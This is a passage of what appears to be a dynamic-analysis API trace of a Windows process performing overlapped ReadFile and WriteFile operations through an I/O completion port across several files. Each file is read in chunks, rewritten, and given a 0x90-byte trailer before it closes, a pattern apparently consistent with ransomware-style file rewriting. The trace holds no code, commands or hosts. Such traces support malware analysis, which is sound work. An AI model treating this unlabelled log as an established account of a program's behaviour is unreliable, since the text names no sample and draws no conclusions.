lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.954] ReadFile (in: hFile=0x1ac, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3750020) returned 1 [0155.954] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.954] ReadFile (in: hFile=0x1a4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3870020) returned 1 [0155.955] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.955] WriteFile (in: hFile=0x1cc, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x1b29, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.955] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.955] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x18e0c, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0155.956] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.956] WriteFile (in: hFile=0x1c0, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0xc963, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0155.956] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.956] WriteFile (in: hFile=0x1d0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0xbfa7, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0155.957] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.957] WriteFile (in: hFile=0x1ac, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0x83c4, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020) returned 1 [0155.957] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.957] WriteFile (in: hFile=0x1a4, lpBuffer=0x3870124*, nNumberOfBytesToWrite=0xc329, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020) returned 1 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1cc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1c0, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1d0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1ac, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3750020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.958] ReadFile (in: hFile=0x1a4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3870020) returned 0x0 [0155.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.958] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.959] WriteFile (in: hFile=0x1cc, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.959] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.959] WriteFile (in: hFile=0x1c0, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0155.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.959] WriteFile (in: hFile=0x1d0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0155.960] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.960] WriteFile (in: hFile=0x1ac, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3750020) returned 1 [0155.960] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.960] WriteFile (in: hFile=0x1a4, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3870020) returned 1 [0155.960] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.960] CloseHandle (hObject=0x1cc) returned 1 [0155.981] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0155.981] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.981] CloseHandle (hObject=0x1c0) returned 1 [0155.992] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0155.995] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.009] CloseHandle (hObject=0x1a4) returned 1 [0156.026] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.086] ReadFile (in: hFile=0x194, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0156.165] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.286] ReadFile (in: hFile=0x1ac, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0156.286] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.287] WriteFile (in: hFile=0x194, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0156.314] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.314] ReadFile (in: hFile=0x1e0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 1 [0156.314] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.314] ReadFile (in: hFile=0x1d8, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3750020) returned 1 [0156.315] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.315] ReadFile (in: hFile=0x1b8, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3870020) returned 1 [0156.315] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.315] ReadFile (in: hFile=0x1cc, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3990020) returned 1 [0156.316] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.316] WriteFile (in: hFile=0x1ac, lpBuffer=0x2b70124, nNumberOfBytesToWrite=0xcc51, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 0x0 [0156.319] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.319] ReadFile (in: hFile=0x194, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0156.319] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.319] WriteFile (in: hFile=0x1e0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0xcb39, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0156.325] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.325] WriteFile (in: hFile=0x1cc, lpBuffer=0x3990124*, nNumberOfBytesToWrite=0xff9f, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3990020) returned 1 [0156.347] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.348] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0156.353] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.353] CloseHandle (hObject=0x1ac) returned 1 [0156.365] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0156.368] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.368] CloseHandle (hObject=0x1e0) returned 1 [0156.397] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0156.400] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0156.412] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ab0020) returned 1 [0156.412] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.415] CloseHandle (hObject=0x1bc) returned 1 [0156.431] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3ab0020) returned 1 [0156.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.482] ReadFile (in: hFile=0x1bc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0156.482] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.483] WriteFile (in: hFile=0x1bc, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x1147d, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0156.490] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.490] ReadFile (in: hFile=0x1bc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0156.490] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0156.490] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.490] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.490] WriteFile (in: hFile=0x1bc, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0156.513] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.513] CloseHandle (hObject=0x1bc) returned 1 [0156.516] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0156.518] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0156.561] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0156.632] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, 